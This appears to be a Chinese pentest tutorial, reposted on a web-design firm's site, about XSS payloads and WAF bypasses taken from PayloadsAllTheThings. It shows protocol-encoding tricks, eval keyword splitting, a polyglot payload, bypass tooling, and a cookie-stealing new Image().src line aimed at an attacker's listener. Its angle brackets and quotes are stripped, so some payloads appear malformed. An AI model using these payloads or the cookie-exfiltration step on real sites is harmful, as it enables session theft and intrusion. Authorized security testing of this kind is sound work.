拓冰建站拓冰建站
首页 / 资讯中心 / 正文

XSS payload 绕过实战速查:WAF 过滤对抗与攻击面全景

XSS payload 绕过实战速查WAF 过滤对抗与攻击面全景【免费下载链接】PayloadsAllTheThingsA list of useful payloads and bypass for Web Application Security and Pentest/CTF项目地址: https://gitcode.com/GitHub_Trending/pa/PayloadsAllTheThingsXSS 检测卡死在 WAF 上是这个项目最真实的场景script被拦、javascript:被拦连alert这个词单独出现都触发拦截规则。PayloadsAllTheThings 是一套面向 Web 渗透测试的开源 payload 库XSS 模块把过滤绕过Filter Bypass、多上下文 Polyglot、CSP 规避、文件型 XSS 和盲打Blind XSS拆成了可对照的文档与 Intruder 字典。下面按攻击面—对抗思路—工具—走查四条线把它用起来。️ 攻击面全景技术域内容代表 payload / 技巧XSS 过滤绕过大小写、标签黑名单、关键字拆分、编码变换sCrIpt、eval(alert(0))常见 WAF 绕过按 Cloudflare / Akamai / Fortinet 等分节收录Tab;混入协议头、#99;实体拆分多上下文 Polyglot一段字符串同时覆盖属性 / 标签 / JS 三种上下文--//sCriptsvG onload…CSP 绕过Content Security Policy 下的执行路径模板字符串、事件处理器变异文件型 XSSSVG、SWF、EXIF 元数据、Markdown、CSSSVG_XSS*.svg、PHP_exif_phpinfo.jpg盲 XSS无回显端点的异步外带与回调XSS Hunter、new Image().src…![XSS攻击面地图文件上传与图片元数据中的XSS注入向量](https://raw.gitcode.com/GitHub_Trending/pa/PayloadsAllTheThings/raw/5443cbde384134094f25b1b440695757a2803d55/Upload Insecure Files/Images/file-upload-mindmap.png?utm_sourcegitcode_repo_files) 过滤对抗拆解对抗 WAF 的核心不是背 payload 清单而是找到它规则里假设成立的那一步然后打破假设。1. 利用 javascript: 伪协议的解析差异原理一句话协议头与冒号之间插入//注释起加 URL 编码换行%0aWAF 正则匹配不到连续的javascript:浏览器却仍按伪协议执行。a document.createElement(a); a.href javascript:alert(); // a.protocol - javascript: a.href javascript://:%0aalert(); // a.protocol - :已变异![javascript伪协议编码混淆演示XSS payload的WAF过滤绕过](https://raw.gitcode.com/GitHub_Trending/pa/PayloadsAllTheThings/raw/5443cbde384134094f25b1b440695757a2803d55/XSS Injection/Images/DwrkbH1VAAErOI2.jpg?utm_sourcegitcode_repo_files)2. 用代码求值绕过关键字黑名单alert、prompt这类函数名是最常见的黑名单词用动态执行把关键词拆开即可。eval(ale rt(0)); Function(ale rt(1))(); setTimeout(ale rt(2));3. 多上下文 Polyglot一段 payload 打三种注入点Polyglot 的本质是用注释/* */、//与标签闭合/script、/textarea把同一字符串同时变成合法的属性值、HTML 标签片段和 JS 表达式。javascript:/*/*/*--/noscript/title/textarea /style/scripthtml onmouseover/*svg/*/onloadalert()// 工具链选型速查工具一句话定位适用场景Burp SuiteIntruder手动 fuzz 的主力配合项目 Intruder 目录下的xss_payloads_quick.txt等字典单参数批量验证、确认回显上下文XSStrikePython单点深度测试框架内置编码与协议类自动变异已知一个反射点逐层试过滤规则DalfoxGo快速批量扫描器批量 URL 首轮过滤、筛出存活端点XSS Hunter盲 XSS 外带回调服务日志、头像 URL 等无回显端点 场景化走查WAF 前置的博客评论框目标系统WAF 前置的博客评论区存在输入回显。注入点comment参数先确认反射位置——输出在div内、在属性内还是在script内直接决定 payload 形态。payload 选择基础scriptalert(1)/script被拦 → 换协议变异javascript://:%0aalert(1)或eval拼接变体若回显在属性内改用带引号闭合的onerror型标签。验证方式本地弹框只算 PoC按项目 Proof of Concept 章节升级——用new Image().src…?cdocument.cookie把 cookie 带回你的监听端才算完成可利用性证明。⚖️ 合规红线未授权 不碰。授权范围外的目标、参数和接口一律不发请求。生产环境避免 DoS 类与批量请求 payload验证用最小代价的alert(1)与无害外带即可。验证后立即通知业务方并删除写入的测试数据与外带记录。 延伸路径XSS Injection 模块的1 - XSS Filter Bypass.md大小写、引号、括号、字符编码的逐条绕过路径XSS Injection 模块的2 - XSS Polyglot.mdPolyglot 构造的原始思路与经典样本XSS Injection 模块的 Proof of Concept 小节Data Grabber、UI Redressing、键盘记录器的完整 PoCUpload Insecure Files/模块SVG、图片 EXIF、PDF 等文件型注入配合上文脑图建立全局项目根目录按漏洞类型分模块组织目录穿越、SQL 注入、反序列化、XXE 等章节可直接对照本文方法复用【免费下载链接】PayloadsAllTheThingsA list of useful payloads and bypass for Web Application Security and Pentest/CTF项目地址: https://gitcode.com/GitHub_Trending/pa/PayloadsAllTheThings创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
分享:

看完干货,该让你的企业上线了

免费需求沟通 · 48 小时内出具建站方案 · 河南本地可上门